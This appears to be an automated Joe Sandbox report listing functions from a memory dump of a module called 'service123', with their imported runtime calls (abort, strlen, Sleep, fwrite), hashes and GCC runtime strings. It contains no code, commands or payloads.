Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: b3e4b6e41a594af15571b98b8c29a01a8465229535d52b4541fdba9819d33cc2
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 20C08CB19CCB294703403D8D10900B8F2A40F3B27CB072E18C00133F00CA06E848C444

Function 6C9DC150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ac04b5c5034bedc96b2d680f9e7bc32391bdbab7c165e2f57728345d8639bb
Instruction ID: 82fb099221247867b7e9ca93a331d014d43816bf016d62738b5617cf32ff6d83
Opcode Fuzzy Hash: 91ac04b5c5034bedc96b2d680f9e7bc32391bdbab7c165e2f57728345d8639bb
Instruction Fuzzy Hash: 3DB1D0716087868FD710DF58C48075ABBF1BF96308F0A896DE995ABB02C335F945CB92

Function 6C9DC470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8a09c7beeaf83704a40197e78c73277ecc5932d5a7392999e584efc9929ca5ca
Instruction ID: 18f5d5562955bf7cd5bceff1280c2c8b9b485618601e24f19a04e528112a3601
Opcode Fuzzy Hash: 8a09c7beeaf83704a40197e78c73277ecc5932d5a7392999e584efc9929ca5ca
Instruction Fuzzy Hash: 6E41D0B1A156148FCB00CF68C8817E9BBF5BF4A348F1A816AD855EF782D335E401DB10

Function 6C9DD370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9DCD00: strlen.MSVCRT ref: 6C9DCD7D

Sleep.KERNEL32 ref: 6C9DD4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: e1d613d9e4468720c768ff326eeba2c9d910c7635c7c3f779bf1ee48c2802599
Instruction ID: 0b1c654aa8686baa2e40bb0d7169a64c86218997250a34d6a0f3994323d0e20e
Opcode Fuzzy Hash: e1d613d9e4468720c768ff326eeba2c9d910c7635c7c3f779bf1ee48c2802599
Instruction Fuzzy Hash: 3351EFA16083C2C9FB19CB39E0457457FF45B5330CF09C55CD6989B782D3BA990ACB6A

Function 6C9DD570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: b3786ffb4ba2e7b51a8c0c0f6a6dce006c960093eb4f374d727a18725e906eb1
Instruction ID: 8d9968467cfe3bd50b7af3b276262b5034fdb31c15f94b43c3ff98f12cfef50f
Opcode Fuzzy Hash: b3786ffb4ba2e7b51a8c0c0f6a6dce006c960093eb4f374d727a18725e906eb1
Instruction Fuzzy Hash: DA31CF716097068FE3109E69D88076AB7E4AF85358F59CA2EE588A7B40E334F544CFD2

Function 6C9DD67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: e91693242560b67356c9126c7f60caf229e20010f5de2557a1a36eb7aef6a5b1
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: EBB092A18899308242412AE904400E5B2245F3B388702AC04810633E010A00F445C444

Function 6C9DD6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: d828cfbeda7bf4caff1ed816083caa14234f36ac606b355e55b8c64d95a81298
Instruction ID: 825a3ddf4d3d4344d9f6a844078ec40896fef5688b5e5da45737a9252ec64287
Opcode Fuzzy Hash: d828cfbeda7bf4caff1ed816083caa14234f36ac606b355e55b8c64d95a81298
Instruction Fuzzy Hash: F14147B1A097018FD310DF19C58075ABBE4EF89708F11C96EE598D7B11D374E8848FA2

Function 6C9DD855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: cf61f9a8e985777c8953dac6f81b3c4ee96faf1d16d8fd823ed1650e4c990cdc
Instruction ID: 8e985f24ed5a468cd743e9a4c0e547bf5db4116a73e56a70bc66956a79667cb9
Opcode Fuzzy Hash: cf61f9a8e985777c8953dac6f81b3c4ee96faf1d16d8fd823ed1650e4c990cdc
Instruction Fuzzy Hash: EEE0E5B19086564BD301EE68D0803657BA06F5330CF155C88C55127B42C334F88BCB41

Function 6C9EC330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C9EC3A1
fwrite.MSVCRT ref: 6C9EC448
fputs.MSVCRT ref: 6C9EC465
fwrite.MSVCRT ref: 6C9EC48E
fputs.MSVCRT ref: 6C9EC4AD
fwrite.MSVCRT ref: 6C9EC4DC
fwrite.MSVCRT ref: 6C9EC50E
abort.MSVCRT ref: 6C9EC513
abort.MSVCRT ref: 6CAA6157
free.MSVCRT ref: 6CAA615F

Part of subcall function 6C9DA340: strlen.MSVCRT ref: 6C9DA3C5
Part of subcall function 6C9DA340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C9EC41C), ref: 6C9DA3E0
Part of subcall function 6C9DA340: free.MSVCRT ref: 6C9DA3EA

Strings

not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C9EC349
terminate called without an active exception, xrefs: 6C9EC4D5
-, xrefs: 6C9EC4C1
terminate called after throwing an instance of ', xrefs: 6C9EC441

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 7083700d75d390b5538f903924c5c52fd653c5003e749c6b87a7c19286cfea8d
Instruction ID: a36a7a323bc4920d7cd0780d4f8405fa29fe0b1f19b7407d6824526bb5e2bc24
Opcode Fuzzy Hash: 7083700d75d390b5538f903924c5c52fd653c5003e749c6b87a7c19286cfea8d
Instruction Fuzzy Hash: 265136B09083159ED701AFA9C58479EBBF4AFA9308F01C91DE4D58B751EB78C489CF92

Function 6C9DD8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3514440e2851532a389173dca1cf5891a4a4c2e0196cde4c479cf23abba5e688
Instruction ID: 3dee445dcffc8ef5c13746e6eee337dec97a121923dd44b08167cd0e80075168
Opcode Fuzzy Hash: 3514440e2851532a389173dca1cf5891a4a4c2e0196cde4c479cf23abba5e688
Instruction Fuzzy Hash: DFF0E2F19643454FD3019F288481366BBA47F53318F490C84D8842BB42C339E8D9CBA1

Function 6C9DDE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C9DDEB8

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 69e91126fb13f090dcbd2541dfaa8f733c5aa14ab67cc30cb0a6faba9a343ee5
Instruction ID: a8b7c66e023340c648077e72cbd930b251488849bbea823d63582e4baa025e6a
Opcode Fuzzy Hash: 69e91126fb13f090dcbd2541dfaa8f733c5aa14ab67cc30cb0a6faba9a343ee5
Instruction Fuzzy Hash: 21219671500A5E8ADB10DF54CC84BD9B7B8AF66319F1185A6C909BB750E734FE88CFA0

Function 6C9DDA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 8ccbfe0a2efdcf49ce61a9f19f9662eebb71605ae12a6a3428f86aa734ada89a
Instruction ID: e027994802327a49be4f8c74e11db5500582e3fb09a6084153ff1e6931601440
Opcode Fuzzy Hash: 8ccbfe0a2efdcf49ce61a9f19f9662eebb71605ae12a6a3428f86aa734ada89a
Instruction Fuzzy Hash: DB415975A006199BCB10DF65C880BDEB7B5AF99318F15C9A9D849B7700D734EE88CFA0

Function 6C9DDCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 0478e331af9797cb36820ee62c83f3ba30634fb81fd3eff141f8e485b1dd4c69
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
